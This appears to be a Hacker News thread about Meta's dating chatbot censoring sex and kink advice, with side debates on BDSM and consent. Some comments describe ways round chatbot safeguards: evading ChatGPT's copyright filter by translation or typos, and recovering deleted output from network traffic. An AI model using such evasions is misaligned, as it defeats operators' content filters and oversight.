Eg. from society’s point of view of supporting young couples for starting families, the ai would recommend one set of obvious recommendations based on sociological data.
On the other hand, from a hedonistic point of view of maximizing short term dopamine, it should recommend completely different behavior.
It could probably screen the user up front on what the goals of the dating are. Eg. Orgasm versus long term relationship.
This! Why should the corporate shareholders take a hit when there is money to be made? After all these AIs are controlled entirely by the corporation, enough giving away frameworks and weights, gift economies don’t profit the owners
The best part is when you have a very “captive audience” in the metaverse. If all your coworkers are using Meta for Work (serious stuff) and for the distributed happy hours, can you afford not to? Say hi to the AI robot bartender, and buy something cool for yourself. Here are some credits
Also, when no one is around, why not pop in and talk to your friend’s avatar, who your friend willingly trained on his conversations, shares and likes to become “more efficient”. That surrogate can now respond to tons of queries from other friends’ surrogates as they wish them Happy Birthday in increasingly creative ways.
And then you can mix and match your friends to create virtual friends you invite to metaverse parties and video calls — they are trained to gradually maximize revenue and may encourage your group to buy some digital assets or rent a dating venue that you don’t really own :) Or maybe be invited by members of your group and gradually shift the individual members’ thinking to one that is more acceptable to the corporation, never backing down or permanently changing their point of view from any arguments from humans. Simply play some friends against other friends and you can make them all purchase something together, get in line or be ostracized!
Imagine how much money can be made by leveraging social capital and hacking people’s relationships. Facebook already cheapened words like “like”, “friend” and birthday wishes. Why not continue to innovate, move fast and break things.
Practicing BDSM in a long term relationship is actually a good way to make it healthier, and many of the things that are good for one (communication, boundaries, self-knowledge) are good for the other.
Even if you're trying to maximize orgasm, you're generally better off with one (or maybe a couple if you're lucky) of really good partners who know you well and who you have excellent chemistry with than a bunch of randos. Conversely, a long term relationship without any sexual chemistry is very likely to end badly.
So I feel the need to disagree with the last part of this because Asexual people exist. I am in a long term relationship with one.
You seem like someone that I would describe as "sex positive" and I feel the need to point out that being in that realm we shouldn't ignore that there are asexual people and it is possible to get different things from different people.
I may not have many sexual relationships with my partner but being in an open relationship myself I don't have to put that pressure on him.
> Practicing BDSM in a long term relationship is actually a good way to make it healthier, and many of the things that are good for one (communication, boundaries, self-knowledge) are good for the other.
That's very black and white. More realistically, "practicing or exploring BDSM if parties are interested and curious".
When I spent a lot more time than I do now in the BDSM scene, there was definitely a subset (and I'm not including you in this - though the ... fetishization ... of BDSM as a 'superset' of a normal relationship is a part of it) of people who had (with varying degrees of subtlety/bluntness) an attitude of sniffing and looking down their noses... "Ohhhh... you're just a vanilla person, are you?" like they were missing out on something.
Nothing wrong with vanilla. Nothing wrong with BDSM. Either can be good.
In reverse, it's interesting the connotation - people rarely suggest "Have you tried removing BDSM from your relationship to see if that will make it healthier?" because they don't want to accept that - for some people - it may be exactly that.
BDSM can be a positive in a healthy relationship. But I've also seen lots of abusive relationships where the abuser gaslit the target into accepting the abuse as BDSM. And the line between the two is rather fuzzy.
Therefore the fact that it is CALLED BDSM doesn't make it healthy.
Doesn’t necessarily make it healthy. Gaslighting will use any and all labels at hand, no matter how irrelevant they are to gaslighting. So, keep in mind that this advice is generically correct for any category label, not just BDSM. “But I love you!” is much more commonly used as a gaslighting substrate, for example.
Gaslighting uses all labels at hand. But BDSM is convenient in that pretty much any form of abusive behavior can be excused with, "We're just kinky people into BDSM."
So sure, "I love you" is used as a bad excuse for a lot of unpleasant stuff. BDSM is used as an excuse for far worse stuff. This does not make either love or BDSM bad - ideas are not responsible for the people who hold them. But it does make me uncomfortable about having people blindly trust an LLM's advise on the topic.
> But BDSM is convenient in that pretty much any form of abusive behavior can be excused with, "We're just kinky people into BDSM."
> But it does make me uncomfortable about having people blindly trust an LLM's advise on the topic.
Never understood why that community struggles to disambiguate this. Seems obvious that it stops being kinky and starts being abusive when the other party no longer derives pleasure from the arrangement.
H. L. Menken's quote applies. "For every complex problem there is an answer that is clear, simple, and wrong."
It really isn't that simple.
Coming at it from the one direction. A variety of conditions from Stockholm syndrome to battered housewife syndrome will cause people to believe that they want and enjoy abusive dynamics. It is speculated that these are tied to evolutionary adaptations to allow us to adapt sudden changes of life circumstances, such as becoming enslaved.
Coming at it from the other direction. People who are into BDSM often trigger these or related dynamics. This is done, on purpose, for pleasure. Search for "maintenance beatings" to verify. Once triggered, it is easy to wind up with those syndromes.
Now if you're looking at these two couples, how do you tell the difference? Their lives are the same. Thanks to the way we rewrite history, their memories are indistinguishable. And, even if it was once consensual, sometimes people change. How can anyone, including them, know if this is what they would freely choose any more if the abuse dynamic were removed?
While you think about it, go read up on battered housewife syndrome. Then listen to https://www.youtube.com/watch?v=T2odlGAxuwQ. Is that written from the point of view of a victim of domestic abuse, or a women who simply likes it rough and got what she wanted?
It starts being abusive when the other party is coerced, pressured, obligated, or otherwise compelled through force or misdirection, to continue the arrangement.
Coercion often begins while the other party is enjoying themselves. That’s still abuse.
The fact that the bot will answer in a kink-friendly way and then censor itself tells me two things.
One, that there are at least two layers -- an answers layer that is probably a typical LLM trained on real-world text, and a censor layer whose job it is to not get Meta in trouble. The censor layer is overzealous because of corporate incentives.
Two, Meta has done an awful job architecting this. Like, really, you're going to have the answer bot push its response before the censor bot even looks at it? And if something needs to change, you delete the original answer and push the censored one? I can only imagine this was done to reduce answer latency, but God what awful UX that creates.
Bing does the same thing, I think just optimizing for latency. Admittedly it probably shaves off 10-15s in the usual response, I’d probably make the same decision.
When Bing AI first launched there were some really shenanigans where the AI would threaten to blackmail or murder the user and half a second later delete the message and replace it with a censored one.
I spent several nights laughing uncontrollably getting ChatGPT to generate things it doesn't want to and as the text would get spicy it would suddenly get cut off, and that would make it much funnier to me. I assumed it worked in the way you described.
ChatGPT's web interface has two, one is triggered by a moderation endpoint API call which scolds you and another one is hardcoded as a regex type filter for copyright which forcibly closes the pipe from the LLM instantly and doesn't acknowledge that something happened. It's hardcoded because a translation to another language or a typo inserted into the output avoids it.
You can get this (or at least could) by asking for the opening of tale of two cities (a public domain work!)
The API (at least via playground) now also has scolding built in, which triggers sometimes when you're just playing around with settings like high temp, because the model can devolve into a mess of all sorts of nonsense text, as is teh nature of transformers, but it doesn't censor it.
The funny thing is that the "plz delete" messages have to be executed by the browser javascript. So in theory, you should be able to capture the "deleted" messages by keeping the network tab open or recording the traffic, right?
Edit: Last time I checked, ChatGPTs web interface was using server-sent events to stream the response words. The events were clearly visible in the network tab if you opened it early enough. So if it sends "delete" messages, they should show up in there.
This is seemingly not at all uncommon. At least in the past when I asked bing for code it would start writing it and then go back and delete what it had written and say that it couldn't help with that.
I have to wonder, how much of it saying what it is saying is just based on societal views (which leads to most written text that it was likely trained on having a certain opinion) vs supposed "thoughts" on the opinion or pushing certain opinions by the company.
Based on the example of it bringing up the ethical slut (fantastic book btw that I highly recommend even for people in monogamous relationships) and then turning around I have to wonder if it is the former.
There is still a ton of stigma around non traditional relationships and kink that it makes sense for something like an LLM to lean in that way without additional tuning. Especially when any ethics about releasing untested AI goes completely out the window.
I strongly disagree about “The Ethical Slut.” The book endorses abuse and lack of compassion towards partners that are afraid, uninterested, or jealous about the idea of open relationships. It encourages people to basically do what they personally feel like and dismiss pain it causes others as their own problem. There is even a scenario in the book about a woman being bullied into attending a lesbian swinger party, lauding this behavior as helping to expand her horizons (by force). That’s definitely abuse, arguably even a form of rape.
No, if people are interested in learning about these topics, get literally any other book. Open relationships require enthusiastic consent from both parties, and emotional sensitivity to your partners needs and feelings.
I would be very curious if you could tell me what pages that is on because I do not remember any of this from that book.
I remember the book emphasizing communication above all else and did not even shit on Monogamy. What it shit on is society assuming what should be the norm with no discussion.
You are right that it requires enthusiastic consent from both parties. But that also doesn't mean that one party has to be unhappy because the other one is not interested in it. At some point you may have to admit that the relationship doesn't have a future if you cannot make this situation work.
I feel like too often the focus is on "well I want an open relationship but my partner doesn't so thats the end of that" when in reality its a 2 way street. That doesn't give you a pass to cheat, but it also doesn't mean ignore what may make you happy.
An empowering story about a woman who gets pressured into attending an orgy, refuses to participate, is visibly uncomfortable the entire time, but still manages to hit it off with a guest who she later ends up in a relationship with outside of that context.
Clearly, the ends justify the means. This is a pretty fucked up book in retrospect.
Unfortunately I can't comment on this particular story, from what I can tell it is not in my edition of the book.
The best I can find on this particular section is that it was in the first edition. I have the third edition so if it isn't there that would make sense why I don't recognize this story.
For context page 174 on my book is talking about Consent and Making Agreements. The 2 references I can find is that it is either Chapter 11, or the first chapter of part 4. Which in my book is either "The Unethical Slut" or "Making Connections" neither of which can I find a story like this. Maybe it is in this edition but I don't currently see it. There is also no chapter or anything in index referred to as "Finding Partners".
However, again without actually reading the story, I feel like we are doing ourselves a diservice if we also don't talk about where things get messy in this regard. A lot of what happens in these spaces are inertially uncomfortable for first time people. or people say the wrong thing and pressure someone into it. We should be able to admit faults and to call the entire book "fucked up" with a single chosen section really doesn't advance the conversation.
To be clear it is wrong that she was pressured, but again without actually being able to read the story myself I am finding it difficult to actually comment on it.
I have not read The Ethical Slut so without commenting on the specifics, but agreed. I was in a long term, very open (kinky, BDSM) relationship with someone, but on the topic of opening things up, there was some guilt applied. "Perhaps if you were more progressive, you'd be into it..." as if dozens of other "progressive" traits in me, sexual or otherwise, were insufficient. It was very much an "unethical" approach at trying to introduce openness.
OK, I clicked on this for humor but came away with some new ideas about the future of this technology ("AI"), how it will be rolled out, and what I should do about it.
Specifically, and as pointed out at the conclusion of this article, corporations deploying "AI" of various shapes are going to do it experimentally like this. They likely don't know the outcomes much better than we do. To me, this presents a risk to early adopters (In this case, people who decide to rely on "AI" to some extent). The effects may ultimately be proven to be positive, but the risk is there, for now. Like the hoverboards that had the potential to spontaneously combust.
I will be trying to teach my children that these toys ("AI") are not something to be trusted, for now. And I will take it more seriously than I have been. Use of "AI" in quotes is obviously intentional. Something programmed to avoid certain topics seems to deviate from the definition as I understand it. I don't think we're really see AI yet.
To me, leaving aside whether a dating AI should offer sexual advice (and I think it should) or whether a company should be in a realm it's obviously not entirely comfortable being in...
this isn't a Product Manager issue. I see an extremely simple solution to the practical affect of this: delay rendering until it has passed the censorship layer. And provide a simple 'neutral' explanation, "that's not an area I'm able to discuss", versus the very Clippy-like "Woah, it looks like you're trying to learn about red flag things..."
> For example, Instagram was once so nipple-allergic that it prohibited pictures of women in many non-sexual contexts such as breastfeeding, even in cases where the nipples themselves weren’t actually visible. The problem sparked an international “Free the Nipple” campaign. After years of corporate resistance, the protest ultimately forced the company to relax its rules about bare-chested women and transgender people.
More like "Free the Breast". You still can't show a nipple that's not blurred or pixelated on Instagram (many photographers use pixelation, because on the thumbnail, it will look uncensored).
Separate from any conversations about censorship, ethics, priority, etc... this is really representative about how utterly clueless and thoughtless companies are being about AI right now. Because multiple people on Facebook signed off on the idea of a chat bot that gives dating advice and somehow they didn't see this coming?
Yeah, no duh the people you gave the dating robot too asked it questions about sex. That's not surprising. How out of touch with reality does a company have to be to think it's even physically possible to have an LLM chatbot in that category that stays family friendly? Nobody who is actually familiar with LLMs would think that's a good idea.
And I think this fits right into what a lot of companies are doing with AI right now, which is to completely ignore any questions about what the scope of what they're trying to do is, whether LLMs are a good fit for what they're trying to do, whether what they're trying to do is even appropriate for their business in the first place, what the failure modes are -- there's no caution around security or ethics, but there's also not even any thought into whether what they're building is useful or fits any product need. I'm not saying that AI doesn't have uses, it clearly does, but there is a level of hype currently that seems be causing executives to turn into hyperactive toddlers. So a bunch of products get launched where AI isn't really a good fit, where it has clear failure modes, and where it's not clear what the companies even want the product's behavior to be or why any of their users would want the thing they're offering. Seriously, who wants a dating advice robot made by Facebook?
But it just gets launched anyway because "it's an LLM and we do those, we're hip. We have that. We have all of it."
It's just so silly. Nobody put a gun to Facebook's head and forced them to put out a dating advice chatbot, and the results of a dating advice chatbot are completely predictable. Did they run out of ideas for other chatbots they could do instead? The knitting advice chatbot wasn't working well enough, so they needed this one?
And it's not just Facebook. ChatGPT as far as I know is still vulnerable to several cross-site user data exfiltration attacks purely because... they don't want to restrict 3rd-party URLs in markdown images. Why? What's wrong with you? Just because a thing exists you don't have to throw the entire kitchen sink at it, you're allowed to think about your products for more than 3 minutes and ask questions like "why would it be essential that our AI chatbot be able to inline-display arbitrary 3rd-party images?" Most email clients don't even do that by default.
So Facebook's response is: "we’re training our models on safety and responsibility guidelines. Teaching the models guidelines means they are less likely to share responses that are potentially harmful or inappropriate for all ages on our apps." But my siblings in Christ, you launched a chatbot that encourages users to ask it for romantic relationship tips. Like, come on. That's on you, that was a mistake you could have avoided by having anyone in the product team be thinking anything deeper at all other than "we have the AIs now, everybody look at us!" It's not even people abusing the product, y'all launched a product that encourages people to ask questions that you don't want to answer.
>In the sexual landscape of 2023, swinging feels quaint
What universe does the author live in?
...oh, the same one who brings the founder of Kinkster into the discussion to tell the audience that the AI censoring such topics is Actually Bad For The Children.
The idea that someone would look at furries and think, "they're so depraved that they like feet" as if that's the weirdest stuff that furries draw or talk about is just really funny to me.
It's like saying that the the scariest thing about Dracula is that he wears a cape.
> Please don't post insinuations about astroturfing, shilling, brigading, foreign agents, and the like. It degrades discussion and is usually mistaken. If you're worried about abuse, email hn@ycombinator.com and we'll look at the data.
3 billion by now, and still growing. They may be an "old people platform" in the West, but they have a very solid foothold in emerging markets. Through unfair competition like offering free mobile data for Facebook they have managed to become "the internet" in a couple countries.
Eg. from society’s point of view of supporting young couples for starting families, the ai would recommend one set of obvious recommendations based on sociological data.
On the other hand, from a hedonistic point of view of maximizing short term dopamine, it should recommend completely different behavior.
It could probably screen the user up front on what the goals of the dating are. Eg. Orgasm versus long term relationship.